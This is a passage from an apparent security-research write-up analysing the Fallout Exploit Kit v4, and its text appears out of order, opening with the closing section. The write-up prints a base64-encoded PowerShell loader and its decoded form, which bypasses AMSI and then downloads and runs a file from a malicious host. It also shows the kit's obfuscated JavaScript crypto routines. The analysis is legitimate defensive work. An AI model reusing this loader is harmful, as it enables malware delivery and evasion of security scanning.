dAByAHkAewAkAGwAMQBJAGwAMQA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQA7ACQAbAAxAEkAbAAxAGwASQAxAEkASQBsAD0AJABsADEASQBsADEALgBHAGUAdABUAHkAcABlACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFUAMwBsAHoAZABHAFYAdABMAGsAMQBoAGIAbQBGAG4AWgBXADEAbABiAG4AUQB1AFEAWABWADAAYgAyADEAaABkAEcAbAB2AGIAaQA1AEIAYgBYAE4AcABWAFgAUgBwAGIASABNAD0AJwApACkAKQA7ACQASQAxAEkAbAAxADEAbAAxAEkAbAA9ACQAbAAxAEkAbAAxAGwASQAxAEkASQBsAC4ARwBlAHQARgBpAGUAbABkACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFkAVwAxAHoAYQBVAGwAdQBhAFgAUgBHAFkAVwBsAHMAWgBXAFEAPQAnACkAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAkAEkAMQBJAGwAMQAxAGwAMQBJAGwALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AH0AYwBhAHQAYwBoAHsAfQA7AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAIgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABJADEAbABJAEkAMQBJAGwAMQB7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAEkAbABJADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJAGwAMQBJADEASQBJADEAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBJAEkASQBsAEkASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbAAxADEAMQBsAEkAbAAxAEkAMQBJADsAfQBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwALABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAFUAbgBpAGMAbwBkAGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABsAEkAMQBsAGwAMQBJAGwAMQBJADEAbAB7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBJAGwASQA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJAGwAMQBsADEAOwBwAHUAYgBsAGkAYwAgAHMAdAByAGkAbgBnACAAbABJADEAbABsADsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAEkAbAAxADEAMQBJAEkASQBsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQAxAGwASQBsADEAbABsADEASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbABJAEkASQBsADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsAGwAMQAxAEkAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsADEASQBsAEkAbAAxADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJAGwASQBJAEkAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsAEkAMQBsAEkAbABJADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJADEAbAAxADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABJAGwAbAAxAEkAbAA7AHAAdQBiAGwAaQBjACAAcwBoAG8AcgB0ACAASQBsAEkASQAxADsAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABJAGwAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwASQBsAEkAbABJAGwASQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAGwAbAAxAEkAbABJAGwASQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAGwAbABJAGwAbABsAEkAMQBJADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAASQAxAEkASQBJADsAfQA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABsADEASQBsADEAMQBJAEkASQB7AFsARABsAGwASQBtAHAAbwByAHQAKAAiACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAiACwAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoAHMAdAByAGkAbgBnACAASQBJAGwASQBJAEkALABzAHQAcgBpAG4AZwAgAEkAbABJAGwASQAsAEkAbgB0AFAAdAByACAASQAxADEAbAAxAEkALABJAG4AdABQAHQAcgAgAGwAMQBsAEkAMQAsAGIAbwBvAGwAIABJAGwASQAxADEASQBJADEAMQAxADEALAB1AGkAbgB0ACAAbAAxADEAMQBJACwASQBuAHQAUAB0AHIAIABsAEkASQBJADEASQBsAGwASQAsAHMAdAByAGkAbgBnACAASQAxAEkAbAAxAGwASQAsAHIAZQBmACAAbABJADEAbABsADEASQBsADEASQAxAGwAIABsAGwAMQAxAEkASQBsADEASQAsAG8AdQB0ACAASQAxAGwASQBJADEASQBsADEAIABsAEkASQAxAEkASQApADsAfQAiADsAJABsAGwAbAAxAEkAbABsAEkAMQA9ACIAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwATABvAHcAXAAkACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwApACsAKAA2ADUALgAuADkAMAApACsAKAA5ADcALgAuADEAMgAyACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4AHwAJQB7AFsAYwBoAGEAcgBdACQAXwB9ACkAKQAuAHQAbQBwACIAOwAkAEkAMQBsADEAMQBJADEAPQAnAGgAdAB0AHAAOgAvAC8AYgBlAGEAaABlAHIAbwA0AHUALgBjAG8AbQAvADEAOQA1ADAALQAwADEALQAxADEALwBPADgAWgByACcAOwBbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcASgBHAE4AcwBhAFQAMABvAFQAbQBWADMATABVADkAaQBhAG0AVgBqAGQAQwBCAE8AWgBYAFEAdQBWADIAVgBpAFEAMgB4AHAAWgBXADUAMABLAFQAcwBrAFkAMgB4AHAATABrAGgAbABZAFcAUgBsAGMAbgBOAGIASgAxAFYAegBaAFgASQB0AFEAVwBkAGwAYgBuAFEAbgBYAFQAMABuAFMAagBVADMAVQBEAGwANQBNAFcAawB6AE0ARQAwAHgATQBEAEoAWQBOAFMAYwA3AEoARwBOAHMAYQBTADUARQBiADMAZAB1AGIARwA5AGgAWgBFAFoAcABiAEcAVQBvAEoARQBrAHgAYgBEAEUAeABTAFQARQBzAEoARwB4AHMAYgBEAEYASgBiAEcAeABKAE0AUwBrADcAJwApACkAfABpAGUAeAA7ACQASQAxAEkAMQBsADEASQBJAGwAbABJADEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAbABJADEAbABsADEASQBsADEASQAxAGwAOwAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxAC4ASQBsAEkASQAxAD0AMAB4ADAAOwAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxAC4ASQBJAEkAbABJAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUwBpAHoAZQBPAGYAKAAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxACkAOwAkAEkASQBsADEASQBsADEASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJADEAbABJAEkAMQBJAGwAMQA7AFsAbAAxAEkAbAAxADEASQBJAEkAXQA6ADoAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoACQAbABsAGwAMQBJAGwAbABJADEALAAkAGwAbABsADEASQBsAGwASQAxACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAJABmAGEAbABzAGUALAAwAHgAMAAwADAAMAAwADAAMAA4ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIgBjADoAIgAsAFsAcgBlAGYAXQAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxACwAWwByAGUAZgBdACQASQBJAGwAMQBJAGwAMQBJACkAfABvAHUAdAAtAG4AdQBsAGwAOwA= Let’s decode and clean. try { $l1Il1 = [Ref].Assembly; $l1Il1lI1IIl = $l1Il1.GetType("System.Management.Automation.AmsiUtils"); $I1Il11l1Il = $l1Il1lI1IIl.GetField("amsiInitFailed", 'NonPublic,Static'); $I1Il11l1Il.SetValue($null, $true); } catch { }; Add-Type -TypeDefinition "using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct I1lII1Il1{public IntPtr IIlI1;public IntPtr lIl1I1II1l;public uint IIIIIlII;public uint Il111lIl1I1I;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct lI1ll1Il1I1l{public uint IIIlI;public string Il1l1;public string lI1ll;public string Il111IIIl;public uint I1lIl1ll1I;public uint IlIIIl1;public uint ll11Ill;public uint Il1IlIl1;public uint lIlIII;public uint lI1lIlI;public uint lI1l11;public uint Ill1Il;public short IlII1;public short IllIll;public IntPtr llIlIlIlI;public IntPtr Ill1IlIlI;public IntPtr IllIlllI1I1;public IntPtr I1III;};public static class l1Il11III{[DllImport(""kernel32.dll"",SetLastError=true)]public static extern bool CreateProcess(string IIlIII,string IlIlI,IntPtr I11l1I,IntPtr l1lI1,bool IlI11II1111,uint l111I,IntPtr lIII1IllI,string I1Il1lI,ref lI1ll1Il1I1l ll11IIl1I,out I1lII1Il1 lII1II);}"; $lll1IllI1 = "$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})).tmp"; $I1l11I1 = 'http://beahero4u.com/1950-01-11/O8Zr'; $cli = (New-Object Net.WebClient); $cli.Headers['User-Agent'] = 'J57P9y1i30M102X5'; $cli.DownloadFile($I1l11I1, $lll1IllI1); $I1I1l1IIllI1 = New-Object lI1ll1Il1I1l; $I1I1l1IIllI1.IlII1 = 0x0; $I1I1l1IIllI1.IIIlI = [System.Runtime.InteropServices.Marshal]::SizeOf($I1I1l1IIllI1); $IIl1Il1I = New-Object I1lII1Il1; [l1Il11III]::CreateProcess($lll1IllI1, $lll1IllI1, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x00000008, [IntPtr]::Zero, "c:", [ref]$I1I1l1IIllI1, [ref]$IIl1Il1I) | out-null; Thus the malware is downloaded and executed. Conclusion Fallout has been heavily updated, making analysis very difficult. Very sophisticated techniques such as Diffie-Hellman key exchange, VM detection, process detection, etc. are used. We need to be careful as they may be updated in the future.

<h2 id="first">First</h2> We have been observing the Fallout Exploit Kit since August 2018. Fallout is using non-characteristic URL and heavily obfuscated landing page. The user still exists and attacks are observed daily. Recently, we were investigating an attack campaign that infects Raccoon Stealer in the flow of PopAds-> KeitaroTDS-> Fallout. About Fallout, we have already written three reports. The first one was about the emergence of Fallout, the second one was to start using PowerShell and the third one was to start exploiting PoC on GitHub. We divide these major changes by version and call them v1~3. <ul> <li><a href="https://nao-sec.org/2018/09/hello-fallout-exploit-kit.html">Hello “Fallout Exploit Kit”</a></li> <li><a href="https://nao-sec.org/2019/01/in-depth-analysis-of-new-fallout.html">In-Depth analysis of new Fallout Exploit Kit</a></li> <li><a href="https://nao-sec.org/2019/03/analysis-of-fallout-exploit-kit-v3.html">Analysis of Fallout Exploit Kit v3</a></li> </ul> We wrote about v3 in March 2019. v3 is not stable and has been updated to the next version immediately. @EKFiddle (created and maintained by @jeromesegura) reported this change on April 11. <blockquote class="twitter-tweet" data-lang="ja"><a href="https://twitter.com/hashtag/EKFiddle?src=hash&ref_src=twsrc%5Etfw">#EKFiddle</a> [Regex update]: <a href="https://twitter.com/hashtag/FalloutEK?src=hash&ref_src=twsrc%5Etfw">#FalloutEK</a> Seems like there is no more use of the PoC on GitHub for CVE-2018-8174. Pushing <a href="https://twitter.com/hashtag/GandCrab?src=hash&ref_src=twsrc%5Etfw">#GandCrab</a> in this particular instance.<a href="https://t.co/U67qZosp1e">https://t.co/U67qZosp1e</a> <a href="https://t.co/buVTakYuhJ">pic.twitter.com/buVTakYuhJ</a>— EKFiddle (@EKFiddle) <a href="https://twitter.com/EKFiddle/status/1116134534989238272?ref_src=twsrc%5Etfw">2019年4月11日</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> We call this a big update v4 (it is still v4). Detailed analysis report has not been written about what kind of update Fallout has done. However, this update is very big. At least for us (Exploit Kit analyst), that made the analysis very cumbersome. Fallout v4 incorporates the following features. <div class="language-md highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. Diffie-Hellman key exchange 2. VM detection 3. Process detection </code></pre></div></div> Here, we will share detailed analysis results on the updates made by Fallout v4. But unfortunately, we did not understand everything. If you are aware of it, please help us. <h2 id="traffic-chain">Traffic chain</h2> First, let’s look at the previous traffic chain. v1~3 was like this. <img src="https://4.bp.blogspot.com/-eXpYD_rUFwU/W4loVPM1TTI/AAAAAAAAAVI/XuE3p36q7QMAVw95gBYPkKOA-IhsdaoAQCLcBGAs/s1600/0.png" alt="" /> <img src="https://3.bp.blogspot.com/-_qnvJOfIOeE/XEiKt9Zs16I/AAAAAAAAAYI/tspkgYcwxe0YjeGhaTGofsUBpfmhjJzmwCLcBGAs/s1600/0.png" alt="" /> <img src="https://nao-sec.org/assets/2019-03-07/01.png" alt="" /> In v3, it acquired PoC of CVE-2018-8174 from GitHub, and attacked by rewriting the part of shellcode. So what kind of traffic chain is v4? <img src="https://nao-sec.org/assets/2019-07-09/01.png" alt="" /> <div class="language-md highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. Landing Page 2. JavaScript Code 3. Encoded Code 1 4. Encoded Code 2 (CVE-2018-8174 + SWF Loader) 5. CVE-2018-15982 6. PowerShell Code 7. Malware </code></pre></div></div> In this way, an attack is performed by seven traffics. Let’s look at each one in order. (In the following, we will use different traffic data from the above. The detailed reason will be mentioned later, but it is difficult to capture and analyze traffic at the same time) <h2 id="landing-page--js-code--encoded-data">Landing Page + JS Code + Encoded Data</h2> In the landing page, JavaScript code is read first. <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><!DOCTYPE html> <html> <head> <meta http-equiv="x-ua-compatible" content="IE=10"> <script type="text/javascript" src="/04_09_2003/Symposium?Peristele=02_03_1943&LE3r=Aps&ILZhH=Frazzling-Anorexias"></script> </head> </code></pre></div></div> This includes CryptoJS and BigInteger obfuscated. Excluding the large library parts, there is very little processing. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// key window.III1l1 = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("8b69cbdfc5fe43e69b7920c8ee721fc9"); // iv window.II1ll11I = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("301ae8205ddcd5897df69e3b0c056c34"); // aes_decrypt(enc_data, key, iv) window.l11llIll = window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"]("p4N9IqH/oiAKHkDCR0zXXfrvhwVrVPsFZSNUjkVFXxxBofjpd5JLM1sdAega3oRy", III1l1, { lI1lIl1Ill: II1ll11I })["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]); </code></pre></div></div> First, two data (<code class="language-plaintext highlighter-rouge">8b69cbdfc5fe43e69b7920c8ee721fc9</code> and <code class="language-plaintext highlighter-rouge">301ae8205ddcd5897df69e3b0c056c34</code>) will appear. This is a key and an IV for AES encryption. By decrypting the next Base64 character string using these keys and IV, the necessary data (specifically, the URL for acquiring encoded data used in the next step) can be obtained. . When it tries decoding, it becomes like this. <img src="https://nao-sec.org/assets/2019-07-09/02.png" alt="" /> Next is the process of checking which browser is being used. Depending on it, Opera, Firefox, IE or Chrome is investigated. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// check browser window["String"]["prototype"]["II1l1IlI"] = function () { return (!!window["opr"] && !!window["opr"]["addons"] || !!window["opera"] || navigator["userAgent"]["indexOf"](" OPR/") >= 0) + this + (typeof window["InstallTrigger"] !== "undefined") + this + (false || !!window["document"]["documentMode"]) + this + (!!window["chrome"] && !!window["chrome"]["runtime"]) }; </code></pre></div></div> Then there is a process to check the version of Adobe Flash Player. This data will be used later. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(function () { window.l1l111I = ''; try { window.l1l111I = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').getVariable('$version') } catch (e) {} })(); </code></pre></div></div> The process then returns to the landing page. In the landing page, one function is defined and executed. Let’s look at that function. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// str_A var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](); // str_B var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_C var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_D var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_E => str_B.modPow(str_C, str_D) var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll, lll1II); </code></pre></div></div> Here, many processes such as <code class="language-plaintext highlighter-rouge">window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']()</code> appear. This is defined in CryptoJS and generates a 32 character random hexadecimal string. After generating four random data, use the second, third and fourth of them to generate the fifth data. Here modPow is used. The five data prepared here will be used in the ensuing cryptographic process. We call them str_A, str_B, str_C, str_D, str_E. The following code is divided into three parts. <code class="language-plaintext highlighter-rouge">Onreadystatechange</code> after the first one has sent a request to the server. The process of generating data to be sent by the second. The third is the process to send. These are the standard XMLHttpRequest POST procedures. First, let’s look at the process of generating transmission data. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var l11IlIIlllll = {}; l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A // browser check data l11IlIIlllll['II1l1IlI'] = '@@' ['II1l1IlI'](); </code></pre></div></div> Five data have been added to the array <code class="language-plaintext highlighter-rouge">l11IlIIlllll</code>. Other than the last one is the random data created earlier. There are 5 random data, but the data other than str_C is send data. The last one is the browser check data generated earlier. It checks whether the browser is Opera, Firefox, IE or Chrome, respectively, and contains true or false and is concatenated with <code class="language-plaintext highlighter-rouge">@@</code>. Such data is prepared for send. It should be noted here that str_C has not been sent to the server. Next, let’s look at the sending process. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>window['I1l1I1'](Il1I11l, "post", l11llIll, true); /* -- snip -- */ // Send POST window['l1lllIIlI']( Il1I11l, // aes_encrypt(data, key, iv) window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill']( window['IIII1Il'](l11IlIIlllll), // post request data window['III1l1'], // key { lI1lIl1Ill: window['II1ll11I'] } // iv )['lIlIlll11l']() ); </code></pre></div></div> This is also a general request sending process. The URL is a string decoded by AES earlier. The data to be sent is the previously prepared data, but these are encrypted by AES. The key and IV are the same as those used to decode the URL. The previous data to be encrypted looks like this. <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{ "lIlII11":"c81e728d9d4c2f636f067f89cc14862c", "lll1II":"a87ff679a2f3e71d9181a67b7542122c", "l11IlIl":"3f05415ebff145466040f6a73dca8704", "lI1lIl1Ill":"c4ca4238a0b923820dcc509a6f75849b", "II1l1IlI":"false@@false@@true@@false" } </code></pre></div></div> The data actually sent is encrypted in this way. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TvU4TAyld3MNlDcMtLwxBo+uVXAbIB1jpPO1a9HDv2dZs7HonG67s8heWoMyvnUFqFBdoEhU0STYjHHQxX6DK7x7Z1naG/2TAdm+AR5l6gpYVl4jXB9oOOyfJtZrfJHabQT5Jhlqv1dtvsJ+0G27qhamqtPT16wCpXn2R2WHf8NJu9SvXSSVadW7sT6QDt32Jt0z3oR0VIlpuE/w3snfKDNIjJYhuMz/VGYIL9WNdg0hC26sxB5fJ5fOOuifh2rNk9GgNsNdfVP01Tf77GRDu9puTbgfsgYOnCz0ONOmp05B14kJ1tK8ZI6ciOWLvOYV </code></pre></div></div> Let’s look at the process after sending. <code class="language-plaintext highlighter-rouge">onreadystatechange</code> is called. Here, two AES decodings are performed. Let’s first look at the first decoding process. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// aes_decrypt(enc_data, key, iv) var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( Il1I11l['responseText'], // enc_data window['III1l1'], // key { lI1lIl1Ill: window['II1ll11I'] } // iv )['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']); var l1I1l1 = window['lIl11'](lIlIl1IIl11); </code></pre></div></div> POST response data is encrypted with AES. The keys and IV are the same as before, and the hard-coded values (<code class="language-plaintext highlighter-rouge">8b69cbdfc5fe43e69b7920c8ee721fc9</code> and <code class="language-plaintext highlighter-rouge">301ae8205ddcd5897df69e3b0c056c34</code>) are hard-coded in the JavaScript code. Jsonify is performed because the JSON data can be obtained by decoding. The decoded JSON data looks like this. <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{ "IlI1l":"9b412e5c651d73fd1e271dd63f6901a0", "I1111":"r+sZGwxURs48PDt8pilYLNYjKbVrMHSmlgv0jeEE7qd8KN+KbbqRpYBUUrEFfM5VSLfRPthHQmyzFoY7fuCtOQQ9vUiMBC+3\/pL…" } </code></pre></div></div> Decode the second data using the first (32-character hexadecimal string) of this data. The first data is called str_F. Also, decoding is done with AES, but the key and IV are different from before. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'], 16); // str_F // key (str_G) => str_F.modPow(str_C, str_D) var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll, lll1II); var I1Il1I1 = llIIlI['lIlIlll11l'](16); var IIIIlI1IllII = 32 - I1Il1I1.length; while (IIIIlI1IllII > 0) { I1Il1I1 = '0' + I1Il1I1; IIIIlI1IllII--; } var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1); var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1); // aes_decrypt(enc_data, key, iv) var Il11lII1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['lIlIl1IIl11'], // enc_data II1ll, // str_G { lI1lIl1Ill: lI1lIl1Ill } // iv => str_A ); </code></pre></div></div> The values generated by str_F, str_C and str_D are called str_G. Thus, str_C is required to decode the data, but str_C has not been sent to the server. By looking at the traffic data, you can see str_E and str_G created by str_C, but it is impossible to find str_C. Please see Wikipedia for details. <ul> <li><a href="https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange">Diffie–Hellman key exchange - Wikipedia</a></li> </ul> The data thus decoded is executed as JavsScript. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// eval II1Il['ll1I1'](); </code></pre></div></div> Let’s look at the executed code. First, the URL used next is decoded. The key and IV used at this time are hard-coded initial values. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// aes_decrypt(enc_url, key, iv) var l11l1I1 =window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"]( "l9kie2x7t4Iq4hRNA3G3Juz+buSrv9OSyATsAvZRjsoWkjatAa3Am6oRnar5jjv2N8XFpvDYQbKswFbyKiGPXM/eRwj5+hz4hg+dTKr5BLk=", III1l1, { lI1lIl1Ill:II1ll11I } )["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]); </code></pre></div></div> Then, as before, the function is called. Let’s look at the function. First, define the necessary data for encryption/decryption as before. Give each one a name as before. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// str_A2 var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](); // str_B2 var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_C2 var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_D2 var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_E2 => str_B2.powMod(str_C2, str_D2) var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll,lll1II); </code></pre></div></div> Next, prepare the data to send as a POST request. Unlike before, Adobe Flash Player version information is also sent. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var l11IlIIlllll = {}; l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B2 l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D2 l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E2 l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A2 l11IlIIlllll['II1l1IlI'] = '@@'['II1l1IlI'](); // browser check data l11IlIIlllll['l1l111I'] = window['l1l111I']; // Adobe Flash Player version check data </code></pre></div></div> The sending process is the same as the previous one. The key and IV used in this case are also initial values. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>window['I1l1I1'](Il1I11l,"post",l11l1I1,true); window['l1lllIIlI']( Il1I11l, // aes_encrypt window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill']( window['IIII1Il'](l11IlIIlllll), // POST Data window['III1l1'], // key {lI1lIl1Ill:window['II1ll11I']} // iv )['lIlIlll11l']() ); </code></pre></div></div> Thus, <code class="language-plaintext highlighter-rouge">onreadystatechange</code> is called as well. Here too, the decoding process is performed as before. First, decode POST response data with the same key and IV as before. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// aes_decrypt(enc_data, key, iv) var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( Il1I11l['responseText'], // enc_data window['III1l1'], // key {lI1lIl1Ill:window['II1ll11I']} // iv )['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']); </code></pre></div></div> When jsonify the decoded result, three data are included like this. The first 32-character hexadecimal string is called str_F2. <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{ "lIlll1IIlI": "87e087b48d4b06215f486021f23f5470", "lIIIIllIl1": "oUeRtTwLk9lLYqMwZC3AM49H8HDw15IqymZ0W\/vw87Vd9RtdXhps9ZppZc\/INO01Bqk79BOMS9ykHCDPE\/\/kWCHQuuh0\/rr…", "II11lIl11": "88HY4nkc9TWmnRPi\/hEPmk8ZCTJ5tIwItosOTmqFjUBFxCXfoXdMKas+TeKLUbdwsXAhvGa35wNmMnajdPzt1huWerzwnhoGcFP…" } </code></pre></div></div> Decrypt these data. Thus two 